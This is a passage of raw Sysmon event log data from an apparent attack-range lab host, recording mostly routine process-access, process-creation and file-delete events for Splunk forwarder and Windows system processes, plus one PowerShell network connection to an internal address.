22:03:41.803{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129663Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.803{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-84BD-613A-0797-03000000C801}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129662Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.802{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-84BD-613A-0797-03000000C801}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129661Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.786{B81B27B7-84BD-613A-0797-03000000C801}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035129660Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.405{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F15E3DB861275F4E5B831BEB6745A20A,SHA256=588CE31FE08E2558DEA41722F43D8A71D62083B544863348259C24C4C13EBA8D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129659Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.404{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4BCF871D70FDC035DB56D566D89686AE,SHA256=9EE77551219360B6FBC5AF3A6B1B6292EA67D0910412AEC4501A72904587F699,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129658Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.270{B81B27B7-84BD-613A-0697-03000000C801}14646752C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129657Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.108{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-84BD-613A-0697-03000000C801}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129656Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.104{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129655Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.104{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129654Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.103{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129653Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.103{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129652Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.103{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-84BD-613A-0697-03000000C801}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129651Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.103{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-84BD-613A-0697-03000000C801}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129650Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.087{B81B27B7-84BD-613A-0697-03000000C801}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035129701Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.803{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F15E3DB861275F4E5B831BEB6745A20A,SHA256=588CE31FE08E2558DEA41722F43D8A71D62083B544863348259C24C4C13EBA8D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129700Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:04:07.026{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62316-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035129699Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129698Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129697Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129696Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129695Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129694Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129693Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129692Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129691Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129690Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129689Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129688Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129687Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129686Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129685Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:42.485{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129684Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 